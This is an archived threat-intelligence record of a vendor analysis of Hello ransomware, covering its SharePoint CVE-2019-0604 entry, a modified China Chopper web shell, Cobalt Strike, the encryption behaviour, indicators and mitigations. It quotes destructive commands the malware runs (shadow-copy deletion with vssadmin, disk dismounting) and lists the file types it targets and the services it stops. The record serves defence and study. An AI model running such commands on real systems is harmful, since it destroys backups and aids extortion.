{
	"id": "d2acfb30-74bb-472b-9abf-8539ed4edeef",
	"created_at": "2026-04-06T00:14:07.018114Z",
	"updated_at": "2026-04-10T13:11:41.785117Z",
	"deleted_at": null,
	"sha1_hash": "adf535b4db699630baf7c7605a9f8e5523d5d08f",
	"title": "Hello Ransomware Uses Updated China Chopper Web Shell, SharePoint Vulnerability",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 658330,
	"plain_text": "Hello Ransomware Uses Updated China Chopper Web Shell, SharePoint\r\nVulnerability\r\nBy By: Janus Agcaoili Apr 27, 2021 Read time: 5 min (1400 words)\r\nPublished: 2021-04-27 · Archived: 2026-04-05 18:20:16 UTC\r\nWe discuss the technical features of a Hello ransomware attack, including its exploitation of CVE-2019-0604 and the use of\r\na modified version of the China Chopper web shell.\r\nIn January, we encountered a new ransomware using .hello as its extension in one of our cases that possibly arrived via a\r\nSharePoint server vulnerability. This appeared to be a new ransomware family dubbed as the Hello ransomware (aka\r\nWickrMe), named after the chat application that was used to contact the cybercriminals responsible. Previous variants were\r\nobserved using .hemming and .strike extensions and did not include the cybercriminals’ WickrMe user handles. In contrast,\r\nnewer versions of the ransom notes with .hello extensions now have the WickrMe contact information.\r\nFigure 1. Ransom note with no WickrMe details and no ransom demand stated\r\nhttps://www.trendmicro.com/en_us/research/21/d/hello-ransomware-uses-updated-china-chopper-web-shell-sharepoint-vulnerability.html\r\nPage 1 of 13\n\nFigure 2. Updated version of the ransom note with WickrMe usernames and demands\r\nThe ransomware arrives at a target system via Microsoft SharePoint vulnerability CVE-2019-0604open on a new tab. To\r\nlaunch a payload, they abuse a Cobalt Strike beacon to launch the ransomware.\r\nBased on our own monitoring of this variant since it emerged three months ago, we also observed an update in the China\r\nChopper web shell, likely in an attempt to circumvent detection with known samples.\r\nLooking at CVE-2019-0604 and China Chopper\r\nAs others have documentedopen on a new tab, CVE-2019-0604 is abused for initial access to the system. However, our\r\nanalysis also revealed that after the exploit is abused for intrusion, the China Chopper web shell (detected by Trend Micro as\r\nBackdoor.ASP.WEBSHELL.SMYAAIAS) is deployed to execute PowerShell commands, which in turn download a Cobalt\r\nStrike beacon. This leads to the infection of a targeted system with the ransomware payload.\r\nWe previously observed the pattern of CVE-2019-0604 leading to China Chopper web shells, and it seems that the Hello\r\nransomware actors are recycling the methods from 2019 for their attack. However, we found this variant using the arbitrary\r\ncode execution from the web shell to deploy Cobalt Strike, eventually leading to the ransomware infection.\r\nBy taking a closer look at pivoting in the underground, we found the exploit available for free in one forum. Considering its\r\navailability, we found no strong indications for attribution for people who are either looking for it or using it for ransomware\r\ndeployments.\r\nHello ransomware routine\r\nFigure 3. Infection chain of a Hello ransomware attack\r\nhttps://www.trendmicro.com/en_us/research/21/d/hello-ransomware-uses-updated-china-chopper-web-shell-sharepoint-vulnerability.html\r\nPage 2 of 13\n\nThe attack stops executing as a guardrail when certain conditions are not met with the argument “{Malware file path}\\\r\n{Malware Name}.exe e {UUID} {BTC}”, wherein:\r\ne is a hard-coded checking capability, which is needed as the first argument.\r\nUUID should be a file with a XML formatted RSA public key existing in the system. Otherwise, it will not proceed\r\nwith its intended encryption routine.\r\nBTC is the amount to be paid, as displayed in the ransom note.\r\nFigure 4. Checking if current user has admin rights. If not, the routine terminates itself.\r\nFigure 5. Finding a formatted RSA public key in the system\r\nThe process of rights escalation is protected using Enigma 3.90news article, a legitimate software that is primarily used for\r\nprotecting executable files. It is important to note that the version used for this routine has been outdated for almost 10\r\nhttps://www.trendmicro.com/en_us/research/21/d/hello-ransomware-uses-updated-china-chopper-web-shell-sharepoint-vulnerability.html\r\nPage 3 of 13\n\nyears, though the date appears to indicate otherwise. While we are not aware of whether the cybercriminals used a legitimate\r\nversion or a crack, we found the software protecting the process from analysis and reverse engineering.\r\nFigure 6. The process of admin rights escalation is protected with an outdated version of a legitimate software.\r\nAfter checking and when the routine finds that the current user has admin rights, it searches for files and folders with\r\nspecific extensions to gather files that it will encrypt. It also searches for the allowlisted directories to avoid encrypting\r\nthem.\r\nhttps://www.trendmicro.com/en_us/research/21/d/hello-ransomware-uses-updated-china-chopper-web-shell-sharepoint-vulnerability.html\r\nPage 4 of 13\n\nFigure 7. Searching for files to encrypt\r\nhttps://www.trendmicro.com/en_us/research/21/d/hello-ransomware-uses-updated-china-chopper-web-shell-sharepoint-vulnerability.html\r\nPage 5 of 13\n\nFigure 8. Avoid encrypting the allowlisted directories\r\nAfter searching, the malware proceeds to encrypt files, such as Office documents, using advanced encryption standard\r\n(AES) while the AES key is encrypted using RSA encryption. Specifically, it encrypts files with the following extensions:\r\n*.txt\r\n*.doc?\r\n*.xls?\r\n*.ppt?\r\n*.pdf\r\n*.csv\r\n*.zip?\r\n*.rar?\r\n*.7z?\r\n*.gz?\r\n*.sql\r\n*.mdf\r\n*.myd\r\n*.ibd\r\n*_fsm\r\n*_vm\r\n*.db?\r\n*.rpt\r\nhttps://www.trendmicro.com/en_us/research/21/d/hello-ransomware-uses-updated-china-chopper-web-shell-sharepoint-vulnerability.html\r\nPage 6 of 13\n\nFigure 9. AES key creation and encryption of files (also with AES)\r\nFigure 10. AES initialization function\r\nhttps://www.trendmicro.com/en_us/research/21/d/hello-ransomware-uses-updated-china-chopper-web-shell-sharepoint-vulnerability.html\r\nPage 7 of 13\n\nWe noticed that the malware avoids encrypting files with the following folders to avoid affecting the system and malware\r\nexecution:\r\n%Windows%\\\r\n%All Users Profile%\\\r\n%System Root%\\$recycle bin\\\r\n%System Root%\\Common Files\\\r\n%System Root%\\windowspowershell\\\r\nIt appends the extension .hello to the encrypted files and drops the following ransom notes:\r\n%public%\\Desktop\\Readme!!!.txt\r\n%Desktop%\\Readme!!!.txt\r\nFigure 11. Appending the extension to the encrypted files\r\nhttps://www.trendmicro.com/en_us/research/21/d/hello-ransomware-uses-updated-china-chopper-web-shell-sharepoint-vulnerability.html\r\nPage 8 of 13\n\nFigure 12. Dropping the ransom notes to the infected system\r\nThe cybercriminals behind this malware makes sure to inhibit restoration of files by deleting backup drives and shadow\r\ncopies. We found that the routine included the execution of the following commands:\r\n\"%System%\\vssadmin.exe\" delete shadows /all – Deletes shadow copy\r\n\"powershell.exe\" Dismount-DiskImage \"{Found filepath.vhd}\" – Dismounts virtual drives\r\nhttps://www.trendmicro.com/en_us/research/21/d/hello-ransomware-uses-updated-china-chopper-web-shell-sharepoint-vulnerability.html\r\nPage 9 of 13\n\nFigure 13. Deleting shadow copies and dismounting virtual drives\r\nIt also deletes files with *backup* strings in their file names, including files with file name extensions that are used for\r\nbackup files in virtual drives such as *.bak, *.bk, *.vbk, *.vbm, and *.vhd. \r\nFigure 14. Deleting backup copies of files\r\nhttps://www.trendmicro.com/en_us/research/21/d/hello-ransomware-uses-updated-china-chopper-web-shell-sharepoint-vulnerability.html\r\nPage 10 of 13\n\nAdditionally, the ransomware routine terminates the services during the search if the malware finds specific backup and\r\ndatabase processes to ensure that these also get encrypted. If the database applications are still running, these database files\r\nwill be “in use” and can’t be accessed for encryption:\r\nmssql\r\nsql\r\npostgresql\r\noracle\r\nmysql\r\nveeam\r\nbackup\r\nFigure 15. Terminating services\r\nWe also noticed that the ransomware routine does not proceed with its encryption routine even when there are ransom notes\r\nin the system. This might be a result of improper execution or perhaps some missing components.\r\nUpdated China Chopper web shells\r\nIn addition, we noticed that there was one subtle difference between the previous China Chopper web shell sample we\r\nobserved and the sample that cybercriminals used in this new attack. \r\nFigure 16. Comparison of China Chopper web shell script versions from the previous attack (top) and an\r\nupdated version taken from the most recent infection (bottom)\r\nWe think that this modified version might be an attempt to circumvent current detections of China Chopper samples. The\r\nscript format might have changed, but its use is still the same: to give the attackers the capability of executing arbitrary shell\r\ncommands on an affected system.\r\nConclusion\r\nhttps://www.trendmicro.com/en_us/research/21/d/hello-ransomware-uses-updated-china-chopper-web-shell-sharepoint-vulnerability.html\r\nPage 11 of 13\n\nMicrosoft released the advisory on CVE-2019-0604 and patched the gap accordingly in 2019.  Since its first abuse and\r\nprominent attackopen on a new tab in 2020, the notable abuse of the vulnerability has continued to make the newsopen on a\r\nnew tab. The use of both the exploit and China Chopper web shells together has been observed for varying attack routines\r\nand poses the question of whether the combination of the two tools indicate a certain level of access among the\r\ncybercriminals using them, or if there are more parties involved and capable of buying access from several people. It is also\r\nworth noting that two years later, the vulnerability’s continued abuse strongly implies that a huge number of companies still\r\nhave not patched the gap.\r\nFurthermore, upon scanning online, there are more samplesopen on a new tab from victims of the same ransom notes,\r\nnotably with the same content but with different email addresses. The ransom demanded also increases as more time passes\r\nbetween the start of original infection and the time when victims email the cybercriminals. Based on our monitoring, we did\r\nnot observe a response from the cybercriminals despite emails sent to them. \r\nRansomware infections remain a culpable threat to users and enterprises’ operations. Here are a few best practices to\r\nmitigate this threat:\r\nAvoid opening unverified emails or clicking on their embedded links, as these can start the ransomware installation\r\nprocess. \r\nBack up your important files using the 3-2-1 rule: Create three backup copies on two different file formats, with one\r\nof the backups in a separate location. \r\nRegularly update software, programs, and applications to ensure that your apps are current and are equipped to\r\ndefend your system against exploits and new vulnerabilities.\r\nEmploy a cross-layeredproducts threat detection and response system capable of monitoring known, unknown, and\r\nstealthy threats and attacks. Secure new and existing workloadsproducts regardless of the environment to make data\r\nsafe without compromising operations and performance.\r\nIndicators of Compromise (IOCs)\r\nSHA256 Detection\r\n2e610b407b6477cde10af9bcd5c24242e31f6acb36df87d0d7b9df27c29c3ebb Ransom.MSIL.HELLO.YALP-A\r\n5deb5eae1af5602c6b8d8c00b2249d67da663bfc32df692a9575c4b65f7276bb\r\nHackTool.Win32.COBEACON.YPBCWT\r\n3bdbfe712926452c4dab3adbb6fdb3f65955ceabd7e3351d83840e6f83e72788\r\n253939be5c1db119f84a6c55e39765baf95d75d98355c5ecd71828d90e3c84dc Trojan.PS1.COBEACON.SMYXAK-B\r\n45793b947e2c8c09742ba5d85b544471d9e5ccedd395dc3ee7faaa9c83dc65b6 Ransom.Win32.HIDDENTEARHAPPY.AB.note\r\nURLs\r\nhxxps[:]//micron[.]xxuz[.]com/css/fps.css         \r\nhxxp[:]//138[.]124[.]180[.]182/css/fpi.css            \r\nhttps://www.trendmicro.com/en_us/research/21/d/hello-ransomware-uses-updated-china-chopper-web-shell-sharepoint-vulnerability.html\r\nPage 12 of 13\n\nhxxps[:]//microsofts[.]dnsrd[.]com/css/home.css             \r\nhxxps[:]//vlad-cdn[.]com/console/login.php       \r\nMITRE ATT\u0026CK Framework\r\nWith additional insights from Trend Micro Research.\r\nTags\r\nSource: https://www.trendmicro.com/en_us/research/21/d/hello-ransomware-uses-updated-china-chopper-web-shell-sharepoint-vulnerability.html\r\nhttps://www.trendmicro.com/en_us/research/21/d/hello-ransomware-uses-updated-china-chopper-web-shell-sharepoint-vulnerability.html\r\nPage 13 of 13",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.trendmicro.com/en_us/research/21/d/hello-ransomware-uses-updated-china-chopper-web-shell-sharepoint-vulnerability.html"
	],
	"report_names": [
		"hello-ransomware-uses-updated-china-chopper-web-shell-sharepoint-vulnerability.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434447,
	"ts_updated_at": 1775826701,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/adf535b4db699630baf7c7605a9f8e5523d5d08f.pdf",
		"text": "https://archive.orkl.eu/adf535b4db699630baf7c7605a9f8e5523d5d08f.txt",
		"img": "https://archive.orkl.eu/adf535b4db699630baf7c7605a9f8e5523d5d08f.jpg"
	}
}